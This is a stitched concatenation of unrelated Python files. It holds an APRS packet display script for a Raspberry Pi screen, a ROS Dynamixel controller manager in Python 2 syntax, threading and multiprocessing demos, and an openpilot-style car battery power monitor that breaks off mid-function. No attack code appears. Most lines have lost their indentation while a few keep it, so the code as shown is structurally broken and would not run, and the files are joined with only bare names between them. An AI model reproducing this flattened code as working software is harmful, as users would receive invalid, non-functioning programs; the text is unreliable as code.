# don't write to display concurrently with thread
display_lock = threading.Lock()
# Create image and drawing object
if disp.rotation % 180 == 90:
height = disp.width # we swap height/width to rotate it to landscape!
width = disp.height
else:
    width = disp.width # no rotation needed: keep the native portrait dimensions
height = disp.height
image = Image.new("RGBA", (width, height))
draw = ImageDraw.Draw(image)
# define some constants to help with graphics layout
padding = 4
title_bar_height = 34
def signal_handler(signal, frame):
print("Got ", signal, " exiting.")
draw.rectangle((0, 0, width, height), outline=0, fill=(30,30,30))
with display_lock:
disp.image(image)
#sys.exit(0) # thread ignores this
os._exit(0)
signal.signal(signal.SIGINT, signal_handler)
signal.signal(signal.SIGTERM, signal_handler)
def parse_arguments():
ap = argparse.ArgumentParser()
ap.add_argument("-l", "--log", required=True, help="Direwolf log file location")
ap.add_argument("-f", "--fontsize", required=False, help="Font size for callsigns")
ap.add_argument("-t", "--title_text", required=False, help="Text displayed in title bar")
ap.add_argument("-o", "--one", action='store_true', required=False, help="Show one station at a time full screen")
args = vars(ap.parse_args())
return args
args = parse_arguments()
logfile = args["log"]
if args["fontsize"]:
# 30 puts 6 lines
# 33 puts 5 lines, max width
fontsize = int(args["fontsize"])
if fontsize > 33:
print("Look, this display isn't very wide, the maximum font size is 33pts, and you chose " + str(fontsize) + "?")
print("Setting to 33 instead.")
fontsize = 33
else:
fontsize = 30 # default 30
if args["title_text"]:
title_text = args["title_text"]
else:
title_text = "Direwatch"
# LED threads: bluetooth, RED, GREEN
def bluetooth_connection_poll_thread():
bt_status = 0
GPIO.setmode(GPIO.BCM)
GPIO.setup(5, GPIO.OUT)
time.sleep(2) # so screen initialization doesn't overdraw bluetooth as off
while True:
cmd = "hcitool con | wc -l"
connection_count = subprocess.check_output(cmd, shell=True).decode("utf-8")
if int(connection_count) > 1:
if bt_status == 0:
bt_status = 1
bticon = Image.open('bt.small.on.png')
GPIO.output(5, GPIO.HIGH)
image.paste(bticon, (width - title_bar_height * 3 + 12 , padding + 2 ), bticon)
with display_lock:
disp.image(image)
else:
if bt_status == 1:
bt_status = 0
bticon = Image.open('bt.small.off.png')
GPIO.output(5, GPIO.LOW)
image.paste(bticon, (width - title_bar_height * 3 + 12 , padding + 2 ), bticon)
with display_lock:
disp.image(image)
time.sleep(2)
bluetooth_thread = threading.Thread(target=bluetooth_connection_poll_thread, name="btwatch")
bluetooth_thread.start()
def red_led_from_logfile_thread(): ## RED logfile
#print("red led changing via logfile")
#f = subprocess.Popen(['tail','-F',logfile], stdout=subprocess.PIPE,stderr=subprocess.PIPE)
f = subprocess.Popen(['tail','-F',logfile], stdout=subprocess.PIPE,stderr=subprocess.PIPE)
while True:
line = f.stdout.readline().decode("utf-8", errors="ignore")
search = re.search("^\[\d[A-Z]\]", line)
if search is not None:
draw.ellipse(( width - title_bar_height * 2 , padding, width - title_bar_height - padding * 2 , title_bar_height - padding), fill=(200,0,0,0))
with display_lock:
disp.image(image)
time.sleep(1)
draw.ellipse(( width - title_bar_height * 2 , padding, width - title_bar_height - padding * 2 , title_bar_height - padding), fill=(80,0,0,0))
with display_lock:
disp.image(image)
def handle_changeG(cb):
with open('/sys/class/gpio/gpio16/value', 'r') as f: ## GREEN
status = f.read(1)
if status == '0':
draw.ellipse(( width - title_bar_height , padding, width - padding * 2, title_bar_height - padding), fill=(0,80,0,0))
else:
draw.ellipse(( width - title_bar_height , padding, width - padding * 2, title_bar_height - padding), fill=(0,200,0,0))
with display_lock:
disp.image(image)
        # no explicit close needed: the with-block releases the file handle
def handle_changeR(cb):
#print("red led changing via gpio")
with open('/sys/class/gpio/gpio12/value', 'r') as f: ## RED GPIO
status = f.read(1)
if status == '0':
draw.ellipse(( width - title_bar_height * 2 , padding, width - title_bar_height - padding * 2 , title_bar_height - padding), fill=(80,0,0,0))
else:
draw.ellipse(( width - title_bar_height * 2 , padding, width - title_bar_height - padding * 2 , title_bar_height - padding), fill=(200,0,0,0))
pass
with display_lock:
disp.image(image)
        # no explicit close needed: the with-block releases the file handle
def null_function(junk): # default callback prints tons of debugging info
return()
# Instantiate a new WatchManager (will be used to store watches).
wmG = pyinotify.WatchManager()
wmR = pyinotify.WatchManager()
# Associate this WatchManager with a Notifier
notifierG = pyinotify.Notifier(wmG, default_proc_fun=null_function)
notifierR = pyinotify.Notifier(wmR, default_proc_fun=null_function)
# Watch both gpio pins for change if they exist
wmG.add_watch('/sys/class/gpio/gpio16/value', pyinotify.IN_MODIFY)
if os.path.exists("/sys/class/gpio/gpio12/value"):
wmR.add_watch('/sys/class/gpio/gpio12/value', pyinotify.IN_MODIFY)
watch_threadG = threading.Thread(target=notifierG.loop, name="led-watcherG", kwargs=dict(callback=handle_changeG))
# Use gpio pin for red led if it exists, otherwise watch log file for transmit activity
if os.path.exists("/sys/class/gpio/gpio12/value"):
watch_threadR = threading.Thread(target=notifierR.loop, name="led-watcherR", kwargs=dict(callback=handle_changeR))
else:
watch_threadR = threading.Thread(target=red_led_from_logfile_thread, name="redledthreadlog")
# Load a TTF font. Make sure the .ttf font file is in the
# same directory as the python script!
# Some other nice fonts to try: http://www.dafont.com/bitmap.php
fontname = "DejaVuSans.ttf"
fontname_bold = "DejaVuSans-Bold.ttf"
if os.path.exists("/usr/share/fonts/truetype/dejavu/" + fontname):
fontpath = "/usr/share/fonts/truetype/dejavu/" + fontname
elif os.path.exists("./" + fontname):
fontpath = "./" + fontname
else:
print("Couldn't find font " + fontname + " in working dir or /usr/share/fonts/truetype/dejavu/")
exit(1)
if os.path.exists("/usr/share/fonts/truetype/dejavu/" + fontname_bold):
fontpath_bold = "/usr/share/fonts/truetype/dejavu/" + fontname_bold
elif os.path.exists("./" + fontname_bold):
fontpath_bold = "./" + fontname_bold
else:
print("Couldn't find font " + fontname_bold + " in working dir or /usr/share/fonts/truetype/dejavu/")
exit(1)
font = ImageFont.truetype(fontpath, fontsize)
font_small = ImageFont.truetype(fontpath_bold, 18)
font_big = ImageFont.truetype(fontpath_bold, 24)
font_huge = ImageFont.truetype(fontpath_bold, 34)
font_epic = ImageFont.truetype(fontpath, 40)
#font = ImageFont.truetype("/usr/share/fonts/truetype/dafont/BebasNeue-Regular.ttf", fontsize)
#font_big = ImageFont.truetype("/usr/share/fonts/truetype/dafont/BebasNeue-Regular.ttf", 24)
#font_huge = ImageFont.truetype("/usr/share/fonts/truetype/dafont/BebasNeue-Regular.ttf", 34)
line_height = font.getsize("ABCJQ")[1] - 1 # tallest callsign, with dangling J/Q tails
# load and scale symbol chart based on font height
symbol_chart0x64 = Image.open("aprs-symbols-64-0.png")
symbol_chart1x64 = Image.open("aprs-symbols-64-1.png")
fontvertical = font.getsize("XXX")[1]
symbol_chart0x64.thumbnail(((fontvertical + fontvertical // 8) * 16, (fontvertical + fontvertical // 8) * 6)) # nudge larger than font, into space between lines
symbol_chart1x64.thumbnail(((fontvertical + fontvertical // 8) * 16, (fontvertical + fontvertical // 8) * 6)) # nudge larger than font, into space between lines
symbol_dimension = symbol_chart0x64.width//16
max_line_width = font.getsize("KN6MUC-15")[0] + symbol_dimension + (symbol_dimension // 8) # longest callsign I can think of, in pixels, plus symbol width + space
max_cols = width // max_line_width
# Draw a black filled box to clear the image.
draw.rectangle((0, 0, width, height), outline=0, fill="#000000")
# Draw our logo
w,h = font.getsize(title_text)
draw.text( (padding * 3 , height // 2 - h) , title_text, font=font_huge, fill="#99AA99")
with display_lock:
disp.image(image)
time.sleep(1)
# erase the screen
draw.rectangle((0, 0, width, height), outline=0, fill="#000000")
# draw the header bar
draw.rectangle((0, 0, width, title_bar_height), fill=(30, 30, 30))
draw.text((padding, padding), title_text, font=font_big, fill="#99AA99")
# draw the bluetooth icon
bticon = Image.open('bt.small.off.png')
image.paste(bticon, (width - title_bar_height * 3 + 12 , padding + 2 ), bticon)
# draw Green LED
draw.ellipse(( width - title_bar_height , padding, width - padding * 2, title_bar_height - padding), fill=(0,80,0,0))
# draw Red LED
draw.ellipse(( width - title_bar_height * 2 , padding, width - title_bar_height - padding * 2 , title_bar_height - padding), fill=(80,0,0,0))
with display_lock:
disp.image(image)
# fire up green/red led threads
watch_threadG.start()
watch_threadR.start()
# setup screen geometries
call = "null"
x = padding
max_lines = ( height - title_bar_height - padding ) // line_height
max_cols = ( width // max_line_width )
line_count = 0
col_count = 0
# tail and block on the log file
f = subprocess.Popen(['tail','-F','-n','10',logfile], stdout=subprocess.PIPE,stderr=subprocess.PIPE)
# Display loops. list of stations, or a single station on the screen at a time
def single_loop():
symbol_chart0x64 = Image.open("aprs-symbols-64-0.png")
symbol_chart1x64 = Image.open("aprs-symbols-64-1.png")
# we try to get callsign, symbol and four relevant info lines from every packet
while True:
info1 = info2 = info3 = info4 = '' # sane defaults
line = f.stdout.readline().decode("utf-8", errors="ignore")
        search = re.search(r"^\[\d\.\d\] (.*)", line) # see if logfile line is an incoming packet over RF
if search is not None:
packetstring = search.group(1)
            packetstring = packetstring.replace('<0x0d>','\x0d').replace('<0x1c>','\x1c').replace('<0x1e>','\x1e').replace('<0x1f>','\x1f').replace('<0x0a>','\x0a')
else:
continue
try:
packet = aprslib.parse(packetstring) # parse packet
#print(packet)
call = packet['from']
supported_packet = True
except Exception as e: # aprslib doesn't support all packet types
#print("Exception: aprslib: ", str(e), ": ", packetstring)
supported_packet = False
packet = {}
            search = re.search(r"^\[\d\.\d\] ([a-zA-Z0-9-]*)", line) # snag callsign from unsupported packet
if search is not None:
call = search.group(1)
symbol = '/' # unsupported packet symbol set to red ball
symbol_table = '/'
else:
continue
try:
if supported_packet:
if 'symbol' in packet: # get symbol from valid packet or use red ball
symbol = packet['symbol']
symbol_table = packet['symbol_table']
else:
symbol = '/'
symbol_table = '/'
# extract relevant info lines
if not supported_packet:
info1 = info2 = info3 = info4 = '' # no info in unsupported packet
elif 'weather' in packet: # weather (often contained in compressed/uncompressed type packets)
info1 = round(packet['weather']['temperature'])
info1 = str(int(info1) * 1.8 + 32) + 'F'
#print(info1)
info2 = str(packet['weather']['rain_since_midnight']) + '\" rain'
#print(info2)
info3 = str(round(packet['weather']['wind_speed'])) + ' m/h'
info3 = info3 + ' ' + str(packet['weather']['wind_direction']) + '\''
#print(info3)
info4 = str(packet['comment'])
#print(info4) # position packet
elif packet['format'] == 'mic-e' or packet['format'] == 'compressed' or packet['format'] == 'uncompressed' or packet['format'] == 'object':
info4 = packet['comment'] # fixme: comment is jibberish in all compressed packets
elif 'status' in packet: # status packet
info4 = packet['status']
except Exception as e:
print("Malformed/missing data: ", str(e), ": ", packetstring)
symbol_dimension = 64
offset = ord(symbol) - 33
row = offset // 16
col = offset % 16
y = height // 3
x = width // 3
draw.rectangle((0, title_bar_height, width, height), outline=0, fill="#000000") # erase most of screen
crop_area = (col*symbol_dimension, row*symbol_dimension, col*symbol_dimension+symbol_dimension, row*symbol_dimension+symbol_dimension)
if symbol_table == '/':
symbolimage = symbol_chart0x64.crop(crop_area)
else:
symbolimage = symbol_chart1x64.crop(crop_area)
symbolimage = symbolimage.resize((height // 2, height // 2), Image.NEAREST)
#image.paste(symbolimage, (0, 36), symbolimage)
image.paste(symbolimage, (0, title_bar_height), symbolimage)
draw.text((120, 50), str(info1), font=font_small, fill="#AAAAAA")
draw.text((120, 70), str(info2), font=font_small, fill="#AAAAAA")
draw.text((120, 90), str(info3), font=font_small, fill="#AAAAAA")
draw.text((5, 144), str(info4), font=font_small, fill="#AAAAAA")
draw.text((5, height - font_epic.getsize("X")[1] - 3), call, font=font_epic, fill="#AAAAAA") # text up from bottom edge
with display_lock:
disp.image(image)
time.sleep(1)
# Display loops. list of stations, or a single station on the screen at a time
def list_loop():
call = "null"
# position cursor in -1 slot, as the first thing the loop does is increment slot
y = padding + title_bar_height - font.getsize("ABCJQ")[1]
x = padding
max_lines = ( height - title_bar_height - padding ) // line_height
max_cols = ( width // max_line_width )
line_count = 0
col_count = 0
while True:
line = f.stdout.readline().decode("utf-8", errors="ignore")
# watch for regular packet
        search = re.search(r"^\[\d\.\d\] (.*)", line)
if search is not None:
packetstring = search.group(1)
            packetstring = packetstring.replace('<0x0d>','\x0d').replace('<0x1c>','\x1c').replace('<0x1e>','\x1e').replace('<0x1f>','\x1f').replace('<0x0a>','\x0a')
else:
continue
lastcall = call
try: # aprslib has trouble parsing all packets
packet = aprslib.parse(packetstring)
call = packet['from']
if 'symbol' in packet:
symbol = packet['symbol']
symbol_table = packet['symbol_table']
else:
symbol = '/'
symbol_table = '/'
except: # if it fails, let's just snag the callsign
#print("aprslib failed to parse.")
            search = re.search(r"^\[\d\.\d\] ([a-zA-Z0-9-]*)", line)
if search is not None:
call = search.group(1)
symbol = '/'
symbol_table = '/'
else:
continue
offset = ord(symbol) - 33
row = offset // 16
col = offset % 16
if call == lastcall: # blink duplicates
time.sleep(0.5)
draw.text((x + symbol_dimension + (symbol_dimension // 8) , y), call, font=font, fill="#000000") # start text after symbol, relative padding
with display_lock:
disp.image(image)
time.sleep(0.1)
draw.text((x + symbol_dimension + (symbol_dimension // 8) , y), call, font=font, fill="#AAAAAA") # start text after symbol, relative padding
with display_lock:
disp.image(image)
else:
y += line_height
if line_count == max_lines: # about to write off bottom edge of screen
col_count += 1
x = col_count * max_line_width
y = padding + title_bar_height
line_count = 0
if col_count == max_cols: # about to write off right edge of screen
x = padding
y = padding + title_bar_height
draw.rectangle((0, title_bar_height + 1, width, height), outline=0, fill="#000000") # erase lines
line_count = 0
col_count = 0
time.sleep(2.0)
crop_area = (col*symbol_dimension, row*symbol_dimension, col*symbol_dimension+symbol_dimension, row*symbol_dimension+symbol_dimension)
if symbol_table == '/':
symbolimage = symbol_chart0x64.crop(crop_area)
else:
symbolimage = symbol_chart1x64.crop(crop_area)
image.paste(symbolimage, (x, y), symbolimage)
draw.text((x + symbol_dimension + (symbol_dimension // 8) , y), call, font=font, fill="#AAAAAA") # start text after symbol, relative padding
line_count += 1
with display_lock:
disp.image(image)
if args["one"]:
single_loop()
else:
list_loop()
exit(0)
|
controller_manager.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Software License Agreement (BSD License)
#
# Copyright (c) 2010, Antons Rebguns, Cody Jorgensen, Cara Slutter
# 2010-2011, Antons Rebguns
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of University of Arizona nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
__author__ = 'Antons Rebguns, Cody Jorgensen, Cara Slutter'
__copyright__ = 'Copyright (c) 2010-2011 Antons Rebguns, Cody Jorgensen, Cara Slutter'
__license__ = 'BSD'
__maintainer__ = 'Antons Rebguns'
__email__ = 'anton@email.arizona.edu'
from threading import Thread, Lock
import sys
import rospy
from dynamixel_driver.dynamixel_serial_proxy import SerialProxy
from diagnostic_msgs.msg import DiagnosticArray
from diagnostic_msgs.msg import DiagnosticStatus
from diagnostic_msgs.msg import KeyValue
from dynamixel_controllers.srv import StartController
from dynamixel_controllers.srv import StartControllerResponse
from dynamixel_controllers.srv import StopController
from dynamixel_controllers.srv import StopControllerResponse
from dynamixel_controllers.srv import RestartController
from dynamixel_controllers.srv import RestartControllerResponse
class ControllerManager:
def __init__(self):
rospy.init_node('dynamixel_controller_manager', anonymous=True)
rospy.on_shutdown(self.on_shutdown)
self.waiting_meta_controllers = []
self.controllers = {}
self.serial_proxies = {}
self.diagnostics_rate = rospy.get_param('~diagnostics_rate', 1)
self.start_controller_lock = Lock()
self.stop_controller_lock = Lock()
manager_namespace = rospy.get_param('~namespace')
serial_ports = rospy.get_param('~serial_ports')
for port_namespace,port_config in serial_ports.items():
port_name = port_config['port_name']
baud_rate = port_config['baud_rate']
readback_echo = port_config['readback_echo'] if 'readback_echo' in port_config else False
min_motor_id = port_config['min_motor_id'] if 'min_motor_id' in port_config else 0
max_motor_id = port_config['max_motor_id'] if 'max_motor_id' in port_config else 253
update_rate = port_config['update_rate'] if 'update_rate' in port_config else 5
error_level_temp = 75
warn_level_temp = 70
if 'diagnostics' in port_config:
if 'error_level_temp' in port_config['diagnostics']:
error_level_temp = port_config['diagnostics']['error_level_temp']
if 'warn_level_temp' in port_config['diagnostics']:
warn_level_temp = port_config['diagnostics']['warn_level_temp']
serial_proxy = SerialProxy(port_name,
port_namespace,
baud_rate,
min_motor_id,
max_motor_id,
update_rate,
self.diagnostics_rate,
error_level_temp,
warn_level_temp,
readback_echo)
serial_proxy.connect()
            # will create a set of services for each serial port under a common manager namespace
# e.g. /dynamixel_manager/robot_arm_port/start_controller
# /dynamixel_manager/robot_head_port/start_controller
# where 'dynamixel_manager' is manager's namespace
# 'robot_arm_port' and 'robot_head_port' are human readable names for serial ports
rospy.Service('%s/%s/start_controller' % (manager_namespace, port_namespace), StartController, self.start_controller)
rospy.Service('%s/%s/stop_controller' % (manager_namespace, port_namespace), StopController, self.stop_controller)
rospy.Service('%s/%s/restart_controller' % (manager_namespace, port_namespace), RestartController, self.restart_controller)
self.serial_proxies[port_namespace] = serial_proxy
# services for 'meta' controllers, e.g. joint trajectory controller
# these controllers don't have their own serial port, instead they rely
# on regular controllers for serial connection. The advantage of meta
# controller is that it can pack commands for multiple motors on multiple
# serial ports.
# NOTE: all serial ports that meta controller needs should be managed by
        # the same controller manager.
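        # For example (names below are illustrative), a joint trajectory controller spanning
        # motors on two serial ports would be started through
        #   /dynamixel_manager/meta/start_controller
        # with its `dependencies` field listing the already-running single-joint controllers.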
rospy.Service('%s/meta/start_controller' % manager_namespace, StartController, self.start_controller)
rospy.Service('%s/meta/stop_controller' % manager_namespace, StopController, self.stop_controller)
rospy.Service('%s/meta/restart_controller' % manager_namespace, RestartController, self.restart_controller)
self.diagnostics_pub = rospy.Publisher('/diagnostics', DiagnosticArray)
if self.diagnostics_rate > 0: Thread(target=self.diagnostics_processor).start()
def on_shutdown(self):
for serial_proxy in self.serial_proxies.values():
serial_proxy.disconnect()
def diagnostics_processor(self):
diag_msg = DiagnosticArray()
rate = rospy.Rate(self.diagnostics_rate)
while not rospy.is_shutdown():
diag_msg.status = []
diag_msg.header.stamp = rospy.Time.now()
for controller in self.controllers.values():
try:
joint_state = controller.joint_state
temps = joint_state.motor_temps
max_temp = max(temps)
status = DiagnosticStatus()
status.name = 'Joint Controller (%s)' % controller.joint_name
status.hardware_id = 'Robotis Dynamixel %s on port %s' % (str(joint_state.motor_ids), controller.port_namespace)
status.values.append(KeyValue('Goal', str(joint_state.goal_pos)))
status.values.append(KeyValue('Position', str(joint_state.current_pos)))
status.values.append(KeyValue('Error', str(joint_state.error)))
status.values.append(KeyValue('Velocity', str(joint_state.velocity)))
status.values.append(KeyValue('Load', str(joint_state.load)))
status.values.append(KeyValue('Moving', str(joint_state.is_moving)))
status.values.append(KeyValue('Temperature', str(max_temp)))
status.level = DiagnosticStatus.OK
status.message = 'OK'
diag_msg.status.append(status)
except:
pass
self.diagnostics_pub.publish(diag_msg)
rate.sleep()
def check_deps(self):
controllers_still_waiting = []
for i,(controller_name,deps,kls) in enumerate(self.waiting_meta_controllers):
if not set(deps).issubset(self.controllers.keys()):
controllers_still_waiting.append(self.waiting_meta_controllers[i])
rospy.logwarn('[%s] not all dependencies started, still waiting for %s...' % (controller_name, str(list(set(deps).difference(self.controllers.keys())))))
else:
dependencies = [self.controllers[dep_name] for dep_name in deps]
controller = kls(controller_name, dependencies)
if controller.initialize():
controller.start()
self.controllers[controller_name] = controller
self.waiting_meta_controllers = controllers_still_waiting[:]
def start_controller(self, req):
port_name = req.port_name
package_path = req.package_path
module_name = req.module_name
class_name = req.class_name
controller_name = req.controller_name
self.start_controller_lock.acquire()
if controller_name in self.controllers:
self.start_controller_lock.release()
return StartControllerResponse(False, 'Controller [%s] already started. If you want to restart it, call restart.' % controller_name)
try:
if module_name not in sys.modules:
# import if module not previously imported
package_module = __import__(package_path, globals(), locals(), [module_name], -1)
else:
# reload module if previously imported
package_module = reload(sys.modules[package_path])
controller_module = getattr(package_module, module_name)
except ImportError, ie:
self.start_controller_lock.release()
return StartControllerResponse(False, 'Cannot find controller module. Unable to start controller %s\n%s' % (module_name, str(ie)))
except SyntaxError, se:
self.start_controller_lock.release()
return StartControllerResponse(False, 'Syntax error in controller module. Unable to start controller %s\n%s' % (module_name, str(se)))
except Exception, e:
self.start_controller_lock.release()
return StartControllerResponse(False, 'Unknown error has occured. Unable to start controller %s\n%s' % (module_name, str(e)))
kls = getattr(controller_module, class_name)
if port_name == 'meta':
self.waiting_meta_controllers.append((controller_name,req.dependencies,kls))
self.check_deps()
self.start_controller_lock.release()
return StartControllerResponse(True, '')
if port_name != 'meta' and (port_name not in self.serial_proxies):
self.start_controller_lock.release()
return StartControllerResponse(False, 'Specified port [%s] not found, available ports are %s. Unable to start controller %s' % (port_name, str(self.serial_proxies.keys()), controller_name))
controller = kls(self.serial_proxies[port_name].dxl_io, controller_name, port_name)
if controller.initialize():
controller.start()
self.controllers[controller_name] = controller
self.check_deps()
self.start_controller_lock.release()
return StartControllerResponse(True, 'Controller %s successfully started.' % controller_name)
else:
self.start_controller_lock.release()
return StartControllerResponse(False, 'Initialization failed. Unable to start controller %s' % controller_name)
def stop_controller(self, req):
controller_name = req.controller_name
self.stop_controller_lock.acquire()
if controller_name in self.controllers:
self.controllers[controller_name].stop()
del self.controllers[controller_name]
self.stop_controller_lock.release()
return StopControllerResponse(True, 'controller %s successfully stopped.' % controller_name)
else:
            self.stop_controller_lock.release()
return StopControllerResponse(False, 'controller %s was not running.' % controller_name)
def restart_controller(self, req):
response1 = self.stop_controller(StopController(req.controller_name))
response2 = self.start_controller(req)
return RestartControllerResponse(response1.success and response2.success, '%s\n%s' % (response1.reason, response2.reason))
if __name__ == '__main__':
try:
manager = ControllerManager()
rospy.spin()
except rospy.ROSInterruptException: pass
|
10.enumerate_all_threads.py
|
import random
import threading
import time
import logging
import sys
logging.basicConfig(level=logging.DEBUG,
format='(%(threadName)-10s) %(message)s',
)
def worker():
"""thread worker function"""
print("Locals values to thread:", threading.local())
lcl = threading.local()
lcl.Name = "sudeep"
print(lcl.Name)
t = threading.currentThread()
print(threading.currentThread().getName())
pause = random.randint(1, 5)
print(pause)
logging.debug('sleeping %s', pause)
time.sleep(pause)
for i in range(1, 3):
t = threading.Thread(target=worker)
print(threading.currentThread().getName())
    t.daemon = True
t.start()
main_thread = threading.currentThread()
for threadId, stack in sys._current_frames().items():
print("thread id: ", threadId, stack)
print(main_thread.getName())
print("total active theads: ", threading.active_count())
for t in threading.enumerate():
if t is main_thread:
continue
logging.debug('continue joining %s', t.getName())
t.join()
|
mp_workers.py
|
import time
import random
from multiprocessing import Process, Queue, current_process, freeze_support
#
# Function run by worker processes
#
def worker(input, output):
for func, args in iter(input.get, 'STOP'):
result = calculate(func, args)
output.put(result)
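# The 'STOP' string acts as a sentinel: iter(input.get, 'STOP') keeps pulling tasks
# from the input queue until a producer enqueues the literal 'STOP', at which point
# the loop ends and the worker process exits cleanly.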
#
# Function used to calculate result
#
def calculate(func, args):
result = func(*args)
return '%s says that %s%s = %s' % \
(current_process().name, func.__name__, args, result)
#
# Functions referenced by tasks
#
def mul(a, b):
time.sleep(0.5*random.random())
return a * b
def plus(a, b):
time.sleep(0.5*random.random())
return a + b
#
#
#
def test():
NUMBER_OF_PROCESSES = 4
TASKS1 = [(mul, (i, 7)) for i in range(20)]
TASKS2 = [(plus, (i, 8)) for i in range(10)]
# Create queues
task_queue = Queue()
done_queue = Queue()
# Submit tasks
for task in TASKS1:
task_queue.put(task)
# Start worker processes
for i in range(NUMBER_OF_PROCESSES):
Process(target=worker, args=(task_queue, done_queue)).start()
# Get and print results
    print('Unordered results:')
for i in range(len(TASKS1)):
        print('\t', done_queue.get())
# Add more tasks using `put()`
for task in TASKS2:
task_queue.put(task)
# Get and print some more results
for i in range(len(TASKS2)):
        print('\t', done_queue.get())
# Tell child processes to stop
for i in range(NUMBER_OF_PROCESSES):
task_queue.put('STOP')
if __name__ == '__main__':
freeze_support()
test()
|
power_monitoring.py
|
import random
import threading
import time
from statistics import mean
from cereal import log
from common.params import Params, put_nonblocking
from common.realtime import sec_since_boot
from selfdrive.hardware import HARDWARE
from selfdrive.swaglog import cloudlog
CAR_VOLTAGE_LOW_PASS_K = 0.091 # LPF gain for 5s tau (dt/tau / (dt/tau + 1))
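# Sanity check of that gain (assuming the ~0.5 s update period the formula in
# the comment implies; the period itself is not defined in this file):
#   dt/tau = 0.5 / 5 = 0.1  ->  K = 0.1 / (0.1 + 1) ~= 0.091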
# A C2 uses about 1W while idling, and 30h seems like a good shutoff for most cars
# While driving, a battery charges completely in about 30-60 minutes
CAR_BATTERY_CAPACITY_uWh = 30e6
CAR_CHARGING_RATE_W = 45
VBATT_PAUSE_CHARGING = 11.0
MAX_TIME_OFFROAD_S = 864000 # time in seconds (10 days)
class PowerMonitoring:
def __init__(self):
self.params = Params()
self.last_measurement_time = None # Used for integration delta
self.last_save_time = 0 # Used for saving current value in a param
self.power_used_uWh = 0 # Integrated power usage in uWh since going into offroad
self.next_pulsed_measurement_time = None
self.car_voltage_mV = 12e3 # Low-passed version of pandaState voltage
self.integration_lock = threading.Lock()
car_battery_capacity_uWh = self.params.get("CarBatteryCapacity")
if car_battery_capacity_uWh is None:
car_battery_capacity_uWh = 0
# Reset capacity if it's low
self.car_battery_capacity_uWh = max((CAR_BATTERY_CAPACITY_uWh / 10), int(car_battery_capacity_uWh))
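    # i.e. a stored value below 3e6 uWh (a tenth of CAR_BATTERY_CAPACITY_uWh)
    # is bumped back up to 3e6 uWh rather than trusted as-is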
# Calculation tick
def calculate(self, pandaState):
try:
now = sec_since_boot()
# If pandaState is None, we're probably not in a car, so we don't care
if pandaState is None or pandaState.pandaState.pandaType == log.PandaState.PandaType.unknown:
with self.integration_lock:
self.last_measurement_time = None
self.next_pulsed_measurement_time = None
self.power_used_uWh = 0
return
# Low-pass battery voltage
self.car_voltage_mV = ((pandaState.pandaState.voltage * CAR_VOLTAGE_LOW_PASS_K) + (self.car_voltage_mV * (1 - CAR_VOLTAGE_LOW_PASS_K)))
# Cap the car battery power and save it in a param every 10-ish seconds
self.car_battery_capacity_uWh = max(self.car_battery_capacity_uWh, 0)
self.car_battery_capacity_uWh = min(self.car_battery_capacity_uWh, CAR_BATTERY_CAPACITY_uWh)
if now - self.last_save_time >= 10:
put_nonblocking("CarBatteryCapacity", str(int(self.car_battery_capacity_uWh)))
self.last_save_time = now
# First measurement, set integration time
with self.integration_lock:
if self.last_measurement_time is None:
self.last_measurement_time = now
return
if (pandaState.pandaState.ignitionLine or pandaState.pandaState.ignitionCan):
# If there is ignition, we integrate the charging rate of the car
with self.integration_lock:
self.power_used_uWh = 0
integration_time_h = (now - self.last_measurement_time) / 3600
if integration_time_h < 0:
raise ValueError(f"Negative integration time: {integration_time_h}h")
self.car_battery_capacity_uWh += (CAR_CHARGING_RATE_W * 1e6 * integration_time_h)
self.last_measurement_time = now
else:
# No ignition, we integrate the offroad power used by the device
is_uno = pandaState.pandaState.pandaType == log.PandaState.PandaType.uno
# Get current power draw somehow
current_power = HARDWARE.get_current_power_draw() # pylint: disable=assignment-from-none
if current_power is not None:
pass
elif HARDWARE.get_battery_status() == 'Discharging':
# If the battery is discharging, we can use this measurement
# On C2: this is low by about 10-15%, probably mostly due to UNO draw not being factored in
current_power = ((HARDWARE.get_battery_voltage() / 1000000) * (HARDWARE.get_battery_current() / 1000000))
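          # (the /1e6 factors suggest the raw readings are in microvolts and
          #  microamps, so this product comes out in watts)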
elif (self.next_pulsed_measurement_time is not None) and (self.next_pulsed_measurement_time <= now):
# TODO: Figure out why this is off by a factor of 3/4???
FUDGE_FACTOR = 1.33
# Turn off charging for about 10 sec in a thread that does not get killed on SIGINT, and perform measurement here to avoid blocking thermal
def perform_pulse_measurement(now):
try:
HARDWARE.set_battery_charging(False)
time.sleep(5)
# Measure for a few sec to get a good average
voltages = []
currents = []
for _ in range(6):
voltages.append(HARDWARE.get_battery_voltage())
currents.append(HARDWARE.get_battery_current())
time.sleep(1)
current_power = ((mean(voltages) / 1000000) * (mean(currents) / 1000000))
self._perform_integration(now, current_power * FUDGE_FACTOR)
# Enable charging again
HARDWARE.set_battery_charging(True)
except Exception:
cloudlog.exception("Pulsed power measurement failed")
# Start pulsed measurement and return
threading.Thread(target=perform_pulse_measurement, args=(now,)).start()
self.next_pulsed_measurement_time = None
return
elif self.next_pulsed_measurement_time is None and not is_uno:
# On a charging EON with black panda, or drawing more than 400mA out of a white/grey one
